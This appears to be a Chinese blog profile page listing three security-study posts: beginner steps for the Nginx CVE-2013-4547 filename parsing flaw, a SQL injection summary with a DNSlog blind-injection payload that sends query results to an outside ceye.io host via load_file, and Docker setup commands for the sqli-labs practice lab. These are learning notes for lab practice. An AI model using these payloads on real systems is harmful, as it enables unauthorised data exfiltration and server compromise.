- 博客(3)
- 收藏
- 关注
原创 Nginx 文件名逻辑漏洞(CVE-2013-4547)新手向
Nginx 文件名逻辑漏洞(CVE-2013-4547)今天尝试了一下CVE-2013-4547这个解析漏洞,按部就班测试的时候发现并没有像部分教程中提到的那样直接解析,大部分是报错信息No input file specified 或者 文件不存在,看了很多文章以及进行过多次尝试后,终于成了,以下为实验步骤:**## 实验步骤:Nginx 文件名逻辑漏洞(CVE-2013-4547) 1.创建文件 ccc.gif 2.burp抓包 ,文件名后加 ccc.gif[空格] 3.网站提示成功 Fi
2020-10-12 23:36:28 379
原创 20206月份sql注入学习总结
Dnslog盲注:攻击者首先提交注入语句select load_file(concat(’\\’,‘攻击语句’,.XXX.ceye.io\abc)),concat()把执行结果语句和XXX.ceye.io\abc进行拼接,构成一个新的域名,而mysql中的select load_file()可以发起请求,那么这一条带有数据库查询结果的域名就被提交到DNS服务器进行解析,DNS服务器上的Dnslog就可以得到SQL注入结果,注入语句中的ceye.io,是一个开放的Dnslog平台,我们可以从平台获取到有关c
2020-07-02 10:56:16 565
原创 2020.06月份sqli-labs学习总结
Docker安装环境:linux install yumlinux yum dockerservice docker startdocker search sqli-labsdocker pull acgpiano/aqli-labsdocker imagesdocker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs容器:docker ps -a docker exec -it 容器名 /bin/bashcd /var/.
2020-07-01 19:31:48 202
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人